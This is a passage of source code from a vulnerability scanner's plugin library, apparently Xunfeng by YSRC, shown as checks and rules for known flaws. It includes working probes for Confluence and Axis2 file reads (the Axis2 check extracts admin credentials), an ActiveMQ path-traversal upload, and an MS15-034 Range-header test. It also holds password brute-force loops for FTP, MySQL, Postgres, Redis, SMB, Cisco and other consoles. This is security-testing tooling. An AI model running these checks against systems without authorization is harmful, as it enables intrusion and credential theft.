13 | 14 | 15 | -------------------------------------------------------------------------------- /server/vulscan/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/superhuahua/xunfengES/427ec1d56b602e6eebe24c51502a23628e5ca5e8/server/vulscan/__init__.py -------------------------------------------------------------------------------- /server/vulscan/vuldb/Confluence_CVE20158399.json: -------------------------------------------------------------------------------- 1 | {"info": "CVE-2015-8399\uff0cAtlassian Confluence 5.8.17\u4e4b\u524d\u7248\u672c\u4e2d\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u5217\u4e3e\u8bfb\u53d6\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u5217\u4e3e\u8bfb\u53d6\u670d\u52a1\u5668\u4e0a\u7684\u6587\u4ef6\u3002", "source": 0, "name": "Confluence\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6", "keyword": "banner:Atlassian Confluence", "level": "\u9ad8\u5371", "url": "https://www.exploit-db.com/exploits/39170/", "author": "wolf@YSRC", "type": "\u6587\u4ef6\u8bfb\u53d6", "plugin": {"url": "/spaces/viewdefaultdecorator.action?decoratorName=/", "tag": "\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e", "analyzing": "keyword", "analyzingdata": "log4j.properties", "data": "", "method": "GET"}} -------------------------------------------------------------------------------- /server/vulscan/vuldb/Docker_Remote_API_20161220120458.json: -------------------------------------------------------------------------------- 1 | { 2 | "info": "Docker Remote API未授权访问可导致代码泄露,严重可导致服务器被入侵控制。", 3 | "source": 1, 4 | "name": "Docker Remote API未授权访问", 5 | "keyword": "port:2375", 6 | "level": "高危", 7 | "url": "http://www.tuicool.com/articles/3Yv2iiY", 8 | "author": "wolf@YSRC", 9 | "type": "未授权访问", 10 | "plugin": { 11 | "url": "/containers/json", 12 | "tag": "Remote API 未授权访问", 13 | "analyzing": "keyword", 14 | "analyzingdata": "HostConfig", 15 | "data": "", 16 | "method": 
"GET" 17 | } 18 | } -------------------------------------------------------------------------------- /server/vulscan/vuldb/ElasticSearch_unauth.json: -------------------------------------------------------------------------------- 1 | { 2 | "name" : "ElasticSearch未授权访问", 3 | "info" : "未授权访问导致数据信息泄露,部分版本或插件存在漏洞,严重可导致服务器被入侵。", 4 | "level": "高危", 5 | "type" : "未授权访问", 6 | "author": "wolf@YSRC", 7 | "url": "", 8 | "keyword" : "server:elasticsearch", 9 | "source" : 1, 10 | "plugin" : { 11 | "url" : "/_cat", 12 | "tag" : "未授权访问", 13 | "analyzing" : "keyword", 14 | "analyzingdata" : "/_cat/master", 15 | "data" : "", 16 | "method" : "GET" 17 | } 18 | } -------------------------------------------------------------------------------- /server/vulscan/vuldb/MS10-070.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import base64 3 | import urllib2 4 | 5 | def get_plugin_info(): 6 | plugin_info = { 7 | "name": ".NET Padding Oracle信息泄露", 8 | "info": "攻击者通过此漏洞最终可以达到任意文件读取的效果。", 9 | "level": "高危", 10 | "type": "任意文件读取", 11 | "author": "wolf@YSRC", 12 | "url": "", 13 | "keyword": "tag:aspx", 14 | "source": 1 15 | } 16 | return plugin_info 17 | 18 | def check(ip, port, timeout): 19 | try: 20 | url = 'http://' + ip + ":" + str(port) 21 | res_html = urllib2.urlopen(url, timeout=timeout).read() 22 | if 'WebResource.axd?d=' in res_html: 23 | error_i = 0 24 | bglen = 0 25 | for k in range(0, 255): 26 | IV = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + chr(k) 27 | bgstr = 'A' * 21 + '1' 28 | enstr = base64.b64encode(IV).replace('=', '').replace('/', '-').replace('+', '-') 29 | exp_url = "%s/WebResource.axd?d=%s" % (url, enstr + bgstr) 30 | try: 31 | request = urllib2.Request(exp_url) 32 | res = urllib2.urlopen(request, timeout=timeout) 33 | res_html = res.read() 34 | res_code = res.code 35 | except urllib2.HTTPError, e: 36 | res_html = e.read() 37 | res_code = e.code 38 | except urllib2.URLError, e: 39 | error_i 
+= 1 40 | if error_i >= 3: return 41 | except: 42 | return 43 | if int(res_code) == 200 or int(res_code) == 500: 44 | if k == 0: 45 | bgcode = int(res_code) 46 | bglen = len(res_html) 47 | else: 48 | necode = int(res_code) 49 | if (bgcode != necode) or (bglen != len(res_html)): 50 | return u'MS10-070 ASP.NET Padding Oracle信息泄露漏洞' 51 | else: 52 | return 53 | except Exception, e: 54 | pass 55 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/MS15-034.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import socket 3 | 4 | 5 | def get_plugin_info(): 6 | plugin_info = { 7 | "name": "HTTP.sys 远程代码执行", 8 | "info": "MS15-034 HTTP.sys 远程代码执行(CVE-2015-1635),但目前仅能作为DOS攻击", 9 | "level": "中危", 10 | "type": "DOS", 11 | "author": "wolf@YSRC", 12 | "url": "https://www.secpulse.com/archives/6009.html", 13 | "keyword": "tag:iis", 14 | "source": 1 15 | } 16 | return plugin_info 17 | 18 | 19 | def check(ip, port, timeout): 20 | try: 21 | socket.setdefaulttimeout(timeout) 22 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 23 | s.connect((ip, int(port))) 24 | flag = "GET / HTTP/1.0\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n" 25 | s.send(flag) 26 | data = s.recv(1024) 27 | s.close() 28 | if 'Requested Range Not Satisfiable' in data: 29 | return u"存在HTTP.sys远程代码执行漏洞" 30 | except: 31 | pass 32 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/superhuahua/xunfengES/427ec1d56b602e6eebe24c51502a23628e5ca5e8/server/vulscan/vuldb/__init__.py -------------------------------------------------------------------------------- /server/vulscan/vuldb/activemq_upload.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import socket 
3 | import time 4 | import urllib2 5 | import random 6 | 7 | def get_plugin_info(): 8 | plugin_info = { 9 | "name": "ActiveMQ unauthenticated RCE", 10 | "info": "CVE-2015-1830,攻击者通过此漏洞可直接上传webshell,进而入侵控制服务器。", 11 | "level": "紧急", 12 | "type": "任意文件上传", 13 | "author": "wolf@YSRC", 14 | "url": "http://cve.scap.org.cn/CVE-2015-1830.html", 15 | "keyword": "title:ActiveMQ", 16 | "source": 1 17 | } 18 | return plugin_info 19 | 20 | def random_str(len): 21 | str1 = "" 22 | for i in range(len): 23 | str1 += (random.choice("ABCDEFGH1234567890")) 24 | return str1 25 | 26 | def check(ip, port, timeout): 27 | try: 28 | socket.setdefaulttimeout(timeout) 29 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 30 | s.connect((ip, port)) 31 | filename = random_str(6) 32 | flag = "PUT /fileserver/sex../../..\\admin/%s.txt HTTP/1.0\r\nContent-Length: 9\r\n\r\nxxscan0\r\n\r\n"%(filename) 33 | s.send(flag) 34 | time.sleep(1) 35 | s.recv(1024) 36 | s.close() 37 | url = 'http://' + ip + ":" + str(port) + '/admin/%s.txt'%(filename) 38 | res_html = urllib2.urlopen(url, timeout=timeout).read(1024) 39 | if 'xxscan0' in res_html: 40 | return u"存在任意文件上传漏洞," + url 41 | except: 42 | pass 43 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/axis_config_read.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import re 3 | import urllib2 4 | 5 | 6 | def get_plugin_info(): 7 | plugin_info = { 8 | "name": "Axis2任意文件读取", 9 | "info": "通过此漏洞可以读取配置文件等信息,进而登陆控制台,通过部署功能可直接获取服务器权限。", 10 | "level": "高危", 11 | "type": "任意文件读取", 12 | "author": "wolf@YSRC", 13 | "url": "http://www.securityfocus.com/bid/40343/info", 14 | "keyword": "tag:axis", 15 | "source": 1 16 | } 17 | return plugin_info 18 | 19 | def check(host, port, timeout): 20 | try: 21 | url = "http://%s:%d" % (host, int(port)) 22 | res = urllib2.urlopen(url + '/axis2/services/listServices', timeout=timeout) 23 | res_code = res.code 24 | 
res_html = res.read() 25 | if int(res_code) == 404: return 26 | m = re.search('\/axis2\/services\/(.*?)\?wsdl">.*?<\/a>', res_html) 27 | if m.group(1): 28 | server_str = m.group(1) 29 | read_url = url + '/axis2/services/%s?xsd=../conf/axis2.xml' % (server_str) 30 | res = urllib2.urlopen(read_url, timeout=timeout) 31 | res_html = res.read() 32 | if 'axisconfig' in res_html: 33 | user = re.search('(.*?)', res_html) 34 | password = re.search('(.*?)', res_html) 35 | info = u'%s 存在任意文件读取漏洞 %s:%s' % (read_url, user.group(1), password.group(1)) 36 | return info 37 | except Exception, e: 38 | pass 39 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/axis_info.json: -------------------------------------------------------------------------------- 1 | { 2 | "name" : "Axis2信息泄露", 3 | "info" : "HappyAxis.jsp 页面存在系统敏感信息。", 4 | "level" : "低危", 5 | "type" : "信息泄露", 6 | "author" : "wolf@YSRC", 7 | "url": "", 8 | "keyword" : "tag:axis2", 9 | "source" : 1, 10 | "plugin" : { 11 | "url" : "/axis2/axis2-web/HappyAxis.jsp", 12 | "tag" : "敏感信息泄露", 13 | "analyzing" : "keyword", 14 | "analyzingdata" : "Axis2 Happiness Page", 15 | "data" : "", 16 | "method" : "GET" 17 | } 18 | } -------------------------------------------------------------------------------- /server/vulscan/vuldb/crack_axis.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | # author:wolf 3 | import urllib2 4 | 5 | 6 | def get_plugin_info(): 7 | plugin_info = { 8 | "name": "Axis2控制台弱口令", 9 | "info": "攻击者通过此漏洞可以登陆管理控制台,通过部署功能可直接获取服务器权限。", 10 | "level": "高危", 11 | "type": "弱口令", 12 | "author": "wolf@YSRC", 13 | "url": "http://www.codesec.net/view/247352.html", 14 | "keyword": "tag:axis", 15 | "source": 1 16 | } 17 | return plugin_info 18 | 19 | 20 | def check(host, port, timeout): 21 | url = "http://%s:%d" % (host, int(port)) 22 | error_i = 0 23 | flag_list = ['Administration Page', 'System Components', 
'"axis2-admin/upload"', 24 | 'include page="footer.inc">', 'axis2-admin/logout'] 25 | user_list = ['axis', 'admin', 'root'] 26 | PASSWORD_DIC.append('axis2') 27 | for user in user_list: 28 | for password in PASSWORD_DIC: 29 | try: 30 | login_url = url + '/axis2/axis2-admin/login' 31 | PostStr = 'userName=%s&password=%s&submit=+Login+' % (user, password) 32 | request = urllib2.Request(login_url, PostStr) 33 | res = urllib2.urlopen(request, timeout=timeout) 34 | res_html = res.read() 35 | except urllib2.HTTPError, e: 36 | return 37 | except urllib2.URLError, e: 38 | error_i += 1 39 | if error_i >= 3: 40 | return 41 | continue 42 | for flag in flag_list: 43 | if flag in res_html: 44 | info = u'存在弱口令,用户名:%s,密码:%s' % (user, password) 45 | return info 46 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/crack_cisco_web.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import urllib2 3 | import ssl 4 | import base64 5 | try: 6 | _create_unverified_https_context = ssl._create_unverified_context # 忽略证书错误 7 | except AttributeError: 8 | pass 9 | else: 10 | ssl._create_default_https_context = _create_unverified_https_context 11 | 12 | def get_plugin_info(): 13 | plugin_info = { 14 | "name": "Cisco_WEB弱口令", 15 | "info": "攻击者可进入web控制台,进而接管控制设备。", 16 | "level": "高危", 17 | "type": "弱口令", 18 | "author": "wolf@YSRC", 19 | "url": "", 20 | "keyword": "tag:cisco", 21 | "source": 1 22 | } 23 | return plugin_info 24 | 25 | def check(ip,port,timeout): 26 | error_i=0 27 | user_list=['admin','cisco','root'] 28 | if port == 443: 29 | url = "https://" + ip + ":" + str(port) 30 | else: 31 | url = "http://" + ip + ":" + str(port) 32 | try: 33 | urllib2.urlopen(url, timeout=timeout) 34 | return 35 | except urllib2.HTTPError,e: 36 | if e.code != 401:return 37 | except: 38 | return 39 | for user in user_list: 40 | for pass_ in PASSWORD_DIC: 41 | try: 42 | pass_ = 
str(pass_.replace('{user}', user)) 43 | request = urllib2.Request(url) 44 | auth_str_temp=user+':'+pass_ 45 | auth_str=base64.b64encode(auth_str_temp) 46 | request.add_header('Authorization', 'Basic '+auth_str) 47 | res = urllib2.urlopen(request,timeout=timeout) 48 | res_code = res.code 49 | if res_code == 200: 50 | return u'存在弱口令 %s:%s' % (user, pass_) 51 | except urllib2.HTTPError: 52 | continue 53 | except urllib2.URLError,e: 54 | error_i+=1 55 | if error_i >= 3:return 56 | continue 57 | else: 58 | pass -------------------------------------------------------------------------------- /server/vulscan/vuldb/crack_ftp.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import ftplib 3 | 4 | 5 | def get_plugin_info(): 6 | plugin_info = { 7 | "name": "FTP弱口令", 8 | "info": "导致敏感信息泄露,严重情况可导致服务器被入侵控制。", 9 | "level": "高危", 10 | "type": "弱口令", 11 | "author": "wolf@YSRC", 12 | "url": "", 13 | "keyword": "server:ftp", 14 | "source": 1 15 | } 16 | return plugin_info 17 | 18 | 19 | def check(ip, port, timeout): 20 | user_list = ['ftp', 'www', 'admin', 'root', 'db', 'wwwroot', 'data', 'web'] 21 | for user in user_list: 22 | for pass_ in PASSWORD_DIC: 23 | pass_ = str(pass_.replace('{user}', user)) 24 | try: 25 | ftp = ftplib.FTP() 26 | ftp.timeout = timeout 27 | ftp.connect(ip, port) 28 | ftp.login(user, pass_) 29 | if pass_ == '': pass_ = "null" 30 | if user == 'ftp' and pass_ == 'ftp': return u"可匿名登录" 31 | return u"存在弱口令,账号:%s,密码:%s" % (user, pass_) 32 | except Exception, e: 33 | if "Errno 10061" in str(e) or "timed out" in str(e): return -------------------------------------------------------------------------------- /server/vulscan/vuldb/crack_glassfish.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | # author:wolf 3 | import urllib2 4 | 5 | 6 | def get_plugin_info(): 7 | plugin_info = { 8 | "name": "Glassfish弱口令", 9 | "info": 
"攻击者通过此漏洞可以登陆管理控制台,通过部署功能可直接获取服务器权限。", 10 | "level": "高危", 11 | "type": "弱口令", 12 | "author": "wolf@YSRC", 13 | "url": "http://www.codesec.net/view/266845.html", 14 | "keyword": "server:ftp", 15 | "source": 1 16 | } 17 | return plugin_info 18 | 19 | 20 | def check(host, port, timeout): 21 | url = "http://%s:%d" % (host, int(port)) 22 | error_i = 0 23 | flag_list = ['Just refresh the page... login will take over', 'GlassFish Console - Common Tasks', 24 | '/resource/common/js/adminjsf.js">', 'Admin Console', 'src="/homePage.jsf"', 25 | 'src="/header.jsf"', 'src="/index.jsf"', 'Common Tasks', 'title="Logout from GlassFish'] 26 | user_list = ['admin'] 27 | PASSWORD_DIC.append('glassfish') 28 | for user in user_list: 29 | for password in PASSWORD_DIC: 30 | try: 31 | PostStr = 'j_username=%s&j_password=%s&loginButton=Login&loginButton.DisabledHiddenField=true' % ( 32 | user, password) 33 | request = urllib2.Request(url + '/j_security_check?loginButton=Login', PostStr) 34 | res = urllib2.urlopen(request, timeout=timeout) 35 | res_html = res.read() 36 | except urllib2.HTTPError: 37 | return 38 | except urllib2.URLError: 39 | error_i += 1 40 | if error_i >= 3: 41 | return 42 | continue 43 | for flag in flag_list: 44 | if flag in res_html: 45 | info = u'存在弱口令,用户名:%s,密码:%s' % (user, password) 46 | return info 47 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/crack_grafana.py: -------------------------------------------------------------------------------- 1 | #-*- encoding:utf-8 -*- 2 | import urllib 3 | import urllib2 4 | 5 | def get_plugin_info(): 6 | plugin_info = { 7 | "name": "grafana 弱口令", 8 | "info": "对grafana控制台进行弱口令检测", 9 | "level": "高危", 10 | "type": "弱口令", 11 | "author": "hos@YSRC", 12 | "url": "https://hackerone.com/reports/174883", 13 | "keyword": "banner:grafana", 14 | "source": 1 15 | } 16 | return plugin_info 17 | 18 | 19 | def check(ip,port,timeout): 20 | url="http://%s:%s/login"%(ip,str(port)) 21 | 
header={ 22 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36', 23 | 'ContentType': 'application/x-www-form-urlencoded; chartset=UTF-8', 24 | 'Accept-Encoding': 'gzip, deflate', 25 | 'Accept-Language': 'zh-CN,zh;q=0.8', 26 | 'Connection': 'close' 27 | } 28 | for password in PASSWORD_DIC: 29 | data={"user":"admin","email":"","password":password} 30 | data=urllib.urlencode(data) 31 | request = urllib2.Request(url=url,data=data,headers=header) 32 | try: 33 | res=urllib2.urlopen(request,timeout=timeout) 34 | if "Logged in" in res.read(): 35 | info = u'存在弱口令,用户名:%s,密码:%s' % ("admin", password) 36 | return info 37 | except Exception,e: 38 | pass 39 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/crack_mongo.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import socket 3 | import binascii 4 | 5 | 6 | def get_plugin_info(): 7 | plugin_info = { 8 | "name": "MongoDB未授权访问", 9 | "info": "导致数据库敏感信息泄露。", 10 | "level": "中危", 11 | "type": "未授权访问", 12 | "author": "wolf@YSRC", 13 | "url": "", 14 | "keyword": "server:mongodb", 15 | "source": 1 16 | } 17 | return plugin_info 18 | 19 | 20 | def check(ip, port, timeout): 21 | try: 22 | socket.setdefaulttimeout(timeout) 23 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 24 | s.connect((ip, int(port))) 25 | data = binascii.a2b_hex( 26 | "3a000000a741000000000000d40700000000000061646d696e2e24636d640000000000ffffffff130000001069736d6173746572000100000000") 27 | s.send(data) 28 | result = s.recv(1024) 29 | if "ismaster" in result: 30 | getlog_data = binascii.a2b_hex( 31 | "480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000") 32 | s.send(getlog_data) 33 | result = s.recv(1024) 34 | if "totalLinesWritten" in result: 35 | return u"未授权访问" 36 | except 
Exception, e: 37 | pass 38 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/crack_mysql.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import re 3 | import hashlib 4 | import struct 5 | import binascii 6 | import socket 7 | 8 | 9 | def get_plugin_info(): 10 | plugin_info = { 11 | "name": "MySQL弱口令", 12 | "info": "导致数据库敏感信息泄露,严重可导致服务器直接被入侵。", 13 | "level": "高危", 14 | "type": "弱口令", 15 | "author": "wolf@YSRC", 16 | "url": "", 17 | "keyword": "server:mysql", 18 | "source": 1 19 | } 20 | return plugin_info 21 | 22 | 23 | def get_hash(password, scramble): 24 | hash_stage1 = hashlib.sha1(password).digest() 25 | hash_stage2 = hashlib.sha1(hash_stage1).digest() 26 | to = hashlib.sha1(scramble + hash_stage2).digest() 27 | reply = [ord(h1) ^ ord(h3) for (h1, h3) in zip(hash_stage1, to)] 28 | hash = struct.pack('20B', *reply) 29 | return hash 30 | 31 | 32 | def get_scramble(packet): 33 | tmp = packet[15:] 34 | m = re.findall("\x00?([\x01-\x7F]{7,})\x00", tmp) 35 | if len(m) > 3: del m[0] 36 | scramble = m[0] + m[1] 37 | try: 38 | plugin = m[2] 39 | except: 40 | plugin = '' 41 | return plugin, scramble 42 | 43 | 44 | def get_auth_data(user, password, scramble, plugin): 45 | user_hex = binascii.b2a_hex(user) 46 | pass_hex = binascii.b2a_hex(get_hash(password, scramble)) 47 | if not password: 48 | data = "85a23f0000000040080000000000000000000000000000000000000000000000" + user_hex + "0000" 49 | else: 50 | data = "85a23f0000000040080000000000000000000000000000000000000000000000" + user_hex + "0014" + pass_hex 51 | if plugin: data += binascii.b2a_hex( 52 | plugin) + "0055035f6f73076f737831302e380c5f636c69656e745f6e616d65086c69626d7973716c045f7069640539323330360f5f636c69656e745f76657273696f6e06352e362e3231095f706c6174666f726d067838365f3634" 53 | len_hex = hex(len(data) / 2).replace("0x", "") 54 | auth_data = len_hex + "000001" + data 55 | return 
binascii.a2b_hex(auth_data) 56 | 57 | 58 | def check(ip, port, timeout): 59 | socket.setdefaulttimeout(timeout) 60 | user_list = ['root'] 61 | for user in user_list: 62 | for pass_ in PASSWORD_DIC: 63 | try: 64 | pass_ = str(pass_.replace('{user}', user)) 65 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 66 | sock.connect((ip, int(port))) 67 | packet = sock.recv(254) 68 | # print packet 69 | plugin, scramble = get_scramble(packet) 70 | auth_data = get_auth_data(user, pass_, scramble, plugin) 71 | sock.send(auth_data) 72 | result = sock.recv(1024) 73 | if result == "\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00": 74 | return u"存在弱口令,账号:%s,密码:%s" % (user, pass_) 75 | except Exception, e: 76 | if "Errno 10061" in str(e) or "timed out" in str(e): return -------------------------------------------------------------------------------- /server/vulscan/vuldb/crack_postgres.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import socket 3 | import hashlib 4 | 5 | 6 | def get_plugin_info(): 7 | plugin_info = { 8 | "name": "PostgresSQL弱口令", 9 | "info": "导致数据库敏感信息泄露,严重可导致服务器直接被入侵。", 10 | "level": "高危", 11 | "type": "弱口令", 12 | "author": "hos@YSRC", 13 | "url": "", 14 | "keyword": "server:postgresql", 15 | "source": 1 16 | } 17 | return plugin_info 18 | 19 | 20 | def make_response(username, password, salt): 21 | pu = hashlib.md5(password + username).hexdigest() 22 | buf = hashlib.md5(pu + salt).hexdigest() 23 | return 'md5' + buf 24 | 25 | 26 | def auth(host, port, username, password, timeout): 27 | try: 28 | socket.setdefaulttimeout(timeout) 29 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 30 | sock.connect((host, port)) 31 | packet_length = len(username) + 7 + len( 32 | "\x03user database postgres application_name psql client_encoding UTF8 ") 33 | p = "%c%c%c%c%c\x03%c%cuser%c%s%cdatabase%cpostgres%capplication_name%cpsql%cclient_encoding%cUTF8%c%c" % ( 34 | 0, 0, 0, packet_length, 0, 0, 0, 0, 
username, 0, 0, 0, 0, 0, 0, 0, 0) 35 | sock.send(p) 36 | packet = sock.recv(1024) 37 | if packet[0] == 'R': 38 | authentication_type = str([packet[8]]) 39 | c = int(authentication_type[4:6], 16) 40 | if c == 5: salt = packet[9:] 41 | else: 42 | return 3 43 | lmd5 = make_response(username, password, salt) 44 | packet_length1 = len(lmd5) + 5 + len('p') 45 | pp = 'p%c%c%c%c%s%c' % (0, 0, 0, packet_length1 - 1, lmd5, 0) 46 | sock.send(pp) 47 | packet1 = sock.recv(1024) 48 | if packet1[0] == "R": 49 | return True 50 | except Exception, e: 51 | if "Errno 10061" in str(e) or "timed out" in str(e): return 3 52 | 53 | 54 | def check(ip, port, timeout): 55 | user_list = ['postgres', 'admin'] 56 | for user in user_list: 57 | for pass_ in PASSWORD_DIC: 58 | try: 59 | pass_ = str(pass_.replace('{user}', user)) 60 | result = auth(ip, port, user, pass_, timeout) 61 | if result == 3: break 62 | if result == True: return u"存在弱口令,用户名:%s 密码:%s" % (user, pass_) 63 | except Exception, e: 64 | pass 65 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/crack_redis.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import socket 3 | 4 | 5 | def get_plugin_info(): 6 | plugin_info = { 7 | "name": "Redis弱口令", 8 | "info": "导致数据库敏感信息泄露,严重可导致服务器被入侵。", 9 | "level": "高危", 10 | "type": "弱口令", 11 | "author": "wolf@YSRC", 12 | "url": "http://www.freebuf.com/vuls/85021.html", 13 | "keyword": "server:redis", 14 | "source": 1 15 | } 16 | return plugin_info 17 | 18 | 19 | def check(ip, port, timeout): 20 | try: 21 | socket.setdefaulttimeout(timeout) 22 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 23 | s.connect((ip, int(port))) 24 | s.send("INFO\r\n") 25 | result = s.recv(1024) 26 | if "redis_version" in result: 27 | return u"未授权访问" 28 | elif "Authentication" in result: 29 | for pass_ in PASSWORD_DIC: 30 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 31 | s.connect((ip, 
int(port))) 32 | s.send("AUTH %s\r\n" % (pass_)) 33 | result = s.recv(1024) 34 | if '+OK' in result: 35 | return u"存在弱口令,密码:%s" % (pass_) 36 | except Exception, e: 37 | pass 38 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/crack_resin.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | # author:wolf 3 | import urllib2 4 | 5 | 6 | def get_plugin_info(): 7 | plugin_info = { 8 | "name": "Resin控制台弱口令", 9 | "info": "攻击者通过此漏洞可以登陆管理控制台,通过部署功能可直接获取服务器权限。", 10 | "level": "高危", 11 | "type": "弱口令", 12 | "author": "wolf@YSRC", 13 | "url": "http://www.360doc.com/content/15/0722/22/11644963_486744404.shtml", 14 | "keyword": "tag:resin", 15 | "source": 1 16 | } 17 | return plugin_info 18 | 19 | 20 | def check(host, port, timeout): 21 | url = "http://%s:%d" % (host, int(port)) 22 | error_i = 0 23 | flag_list = ['

', 'The Resin version', 'Resin Summary'] 24 | user_list = ['admin'] 25 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor()) 26 | for user in user_list: 27 | for password in PASSWORD_DIC: 28 | try: 29 | PostStr = 'j_username=%s&j_password=%s' % (user, password) 30 | res = opener.open(url + '/resin-admin/j_security_check?j_uri=index.php', PostStr ,timeout=timeout) 31 | res_html = res.read() 32 | res_code = res.code 33 | except urllib2.HTTPError, e: 34 | return 35 | except urllib2.URLError, e: 36 | error_i += 1 37 | if error_i >= 3: 38 | return 39 | continue 40 | for flag in flag_list: 41 | if flag in res_html or int(res_code) == 408: 42 | info = u'%s/resin-admin 存在弱口令 用户名:%s,密码:%s' % (url, user, password) 43 | return info 44 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/crack_ruijie_ac_web.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import urllib2 3 | import ssl 4 | import base64 5 | 6 | try: 7 | _create_unverified_https_context = ssl._create_unverified_context # 忽略证书错误 8 | except AttributeError: 9 | pass 10 | else: 11 | ssl._create_default_https_context = _create_unverified_https_context 12 | 13 | 14 | def get_plugin_info(): 15 | plugin_info = { 16 | "name": "锐捷AC弱口令", 17 | "info": "攻击者可进入web控制台,进而接管控制设备。", 18 | "level": "高危", 19 | "type": "弱口令", 20 | "author": "wolf@YSRC", 21 | "url": "", 22 | "keyword": "banner:RGOS;port:80", 23 | "source": 1 24 | } 25 | return plugin_info 26 | 27 | 28 | def check(ip, port, timeout): 29 | error_i = 0 30 | user_list = ['admin'] 31 | if port == 443: 32 | url = "https://" + ip + ":" + str(port) + "/login.do" 33 | else: 34 | url = "http://" + ip + ":" + str(port) + "/login.do" 35 | for user in user_list: 36 | for pass_ in PASSWORD_DIC: 37 | try: 38 | pass_ = str(pass_.replace('{user}', user)) 39 | request = urllib2.Request(url) 40 | auth_str_temp = user + ':' + pass_ 41 | auth_str = 
base64.b64encode(auth_str_temp) 42 | postdata = "auth=" + auth_str 43 | res = urllib2.urlopen(request, postdata, timeout=timeout) 44 | res_html = res.read() 45 | if "Success" in res_html: 46 | return u'存在弱口令 %s:%s' % (user, pass_) 47 | except urllib2.HTTPError: 48 | break 49 | except urllib2.URLError, e: 50 | error_i += 1 51 | if error_i >= 3: return 52 | continue 53 | else: 54 | pass 55 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/crack_smb.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | from smb.SMBConnection import SMBConnection 3 | import socket 4 | 5 | def get_plugin_info(): 6 | plugin_info = { 7 | "name": "SMB弱口令", 8 | "info": "直接导致机器被直接入侵控制。", 9 | "level": "紧急", 10 | "type": "弱口令", 11 | "author": "wolf@YSRC", 12 | "url": "", 13 | "keyword": "server:smb", 14 | "source": 1 15 | } 16 | return plugin_info 17 | 18 | def ip2hostname(ip): 19 | try: 20 | hostname = socket.gethostbyaddr(ip)[0] 21 | return hostname 22 | except: 23 | pass 24 | try: 25 | query_data = "\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x20\x43\x4b\x41\x41" + \ 26 | "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + \ 27 | "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x21\x00\x01" 28 | dport = 137 29 | _s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 30 | _s.sendto(query_data, (ip, dport)) 31 | x = _s.recvfrom(1024) 32 | tmp = x[0][57:] 33 | hostname = tmp.split("\x00", 2)[0].strip() 34 | hostname = hostname.split()[0] 35 | return hostname 36 | except: 37 | pass 38 | def check(ip,port,timeout): 39 | socket.setdefaulttimeout(timeout) 40 | user_list = ['administrator'] 41 | hostname = ip2hostname(ip) 42 | PASSWORD_DIC.insert(0,'anonymous') 43 | if not hostname:return 44 | for user in user_list: 45 | for pass_ in PASSWORD_DIC: 46 | try: 47 | pass_ = str(pass_.replace('{user}', user)) 48 | conn = SMBConnection(user,pass_,'xunfeng',hostname) 49 
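# (tail of crack_smb.py check(): inside the try: of the user/password loops)
                if conn.connect(ip) == True:
                    # 'anonymous' is inserted at index 0 of PASSWORD_DIC above, so it is tried first
                    if pass_ == 'anonymous':return u"存在匿名共享,请查看是否存在敏感文件。"
                    return u"存在弱口令,用户名:%s 密码:%s"%(user,pass_)
            except Exception,e:
                # Errno 10061 is the Windows ECONNREFUSED only; this host-unreachable shortcut
                # does not trigger on Linux (Errno 111) or macOS (Errno 61).
                if "Errno 10061" in str(e) or "timed out" in str(e): return
-------------------------------------------------------------------------------- /server/vulscan/vuldb/crack_ssh.py: --------------------------------------------------------------------------------
# coding:utf-8
import errno

import paramiko


def get_plugin_info():
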